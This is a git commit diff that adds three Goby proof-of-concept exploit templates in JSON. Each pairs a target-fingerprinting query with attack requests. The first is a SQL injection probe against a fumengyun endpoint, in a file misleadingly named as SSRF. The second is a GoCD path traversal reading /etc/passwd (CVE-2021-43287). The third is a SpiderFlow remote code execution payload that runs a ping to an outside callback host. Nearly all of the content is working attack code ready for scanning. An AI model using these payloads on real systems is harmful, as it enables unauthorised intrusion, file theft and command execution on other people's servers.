Add files via upload

goby_pocs/Cerebro_request_SSRF.json

@@ -0,0 +1,99 @@
+{
+ "Name": "fumengyun AjaxMethod.ashx SQL injection",
+ "Level": "3",
+ "Tags": [
+ "sqli"
+ ],
+ "GobyQuery": "title=\"孚盟云\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "[email protected]",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "500",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "SELECT",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-02 21:53:57",
+ "GobyVersion": "1.9.323"
+}

goby_pocs/GoCD_Arbitrary_file_reading_CVE_2021_43287.json

@@ -0,0 +1,99 @@
+{
+ "Name": "GoCD Arbitrary file reading CVE-2021-43287",
+ "Level": "3",
+ "Tags": [
+ "fileread"
+ ],
+ "GobyQuery": "title=\"Login - Go\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "[email protected]",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "root",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-15 22:05:52",
+ "GobyVersion": "1.9.323"
+}

goby_pocs/SpiderFlow_save__remote_code.json

@@ -0,0 +1,99 @@
+{
+ "Name": "SpiderFlow save remote code",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "title=\"SpiderFlow\"",
+ "Description": "",
+ "Product": "",
+ "Homepage": "https://gobies.org/",
+ "Author": "[email protected]",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://gobies.org/"
+ ],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/function/save",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "id=&name=cmd&parameter=yw&script=}Java.type('java.lang.Runtime').getRuntime().exec('ping amth5e.ceye.io');{",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "exec",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2022-07-07 22:15:11",
+ "GobyVersion": "1.9.323"
+}